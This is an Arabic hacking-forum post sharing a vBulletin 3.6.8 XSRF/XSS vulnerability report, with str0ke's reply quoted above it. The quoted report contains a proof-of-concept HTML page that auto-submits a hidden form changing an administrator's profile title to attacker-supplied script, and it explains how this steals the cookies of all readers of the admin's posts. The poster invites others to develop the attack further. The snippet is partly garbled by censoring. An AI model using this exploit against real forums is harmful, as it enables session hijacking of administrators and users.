السلام عليكم ورحمة الله تعالى و بركاته،
كيفكم يا شباب عراب..إن شاء الله بخير...
تم إكتشاف ثغرة من نوع XSRF/XSS بمنتيات الفي بي 3.6.8...هي مجربة على localhost لكن ممكن تفيد حتى في remote host...
تمت مراسلة حبيبنا str0ke وهذا نص رده:
------------------
Nice find man. I currently don't post up xss vulnerabilities though. I
will have a section soon enough and have this posted in it.
Regards,
/str0ke
Napst3r wrote:
> ################################################## #######################
> vBulletin 3.6.8 XSRF/XSS Vulnerability
> ################################################## #######################
> --------
> AUTHOR : Napst3r
> Email:
xn9@hotmail.fr <mailto:xn9@hotmail.fr>
> Country: Morocco
> Founded: 5, January 2008
> vBulletin Version: 3.6.8 Patch Level x and possible lower
> Type: XSRF/XSS
> Risk: Medium
> --------
> > ##Explanation(english)## > > My english is bad, but I try :-) .
> vBulletin 3.6.8 is XSRF vulnurable.
> > Administrators can use html in there own usertitle.
> > An attacker can update the profile of an administrator by sending a
> link > to a site with a code like this: > > > <html> > <head></head> >
> <body onLoad=javascript:********.form.submit()> > > <form >
> action="link://[click]; > method="POST" name="form"> > > <input
> type="hidden" name="s" value=""> > <input type="hidden" name="do"
> value="updateprofile"> > <input type="hidden" name="custom****"
> value="###########XSS > CODE#########"> <!-- Attacker's XSS Code --> >
> <input type="hidden" name="month" value="-1"> > <input type="hidden"
> name="day" value="-1"> > <input type="hidden" name="year" value=""> >
> <input type="hidden" name="oldbirthday" value=""> > <input
> type="hidden" name="showbirthday" value="2"> > <input type="hidden"
> name="homepage" value=""> > <input type="hidden" name="icq" value="">
> > <input type="hidden" name="aim" value=""> > <input type="hidden"
> name="msn" value=""> > <input type="hidden" name="yahoo" value=""> >
> <input type="hidden" name="skype" value=""> > </form> > </body> >
> </html> > > If an attacker send a link in a pm for example, to the
> admin with a site > like the example code, the admin's usertitle
> updating and have a the code > of the attacker.The code executing if
> the admin have a post done in a > thread etc. An attacker can use this
> to steal the ****** of all user's who > are reading the thread.
--------
والله ممكن تطورو الفكرة يا شباب العراب و هذا مو صعب عليكم...لا زال مستواي ضعيف في اكتشاف الثغرات لكن إن شاء الله يكون خير في الأيام المقبلة
أخوكم الجاهد
سلام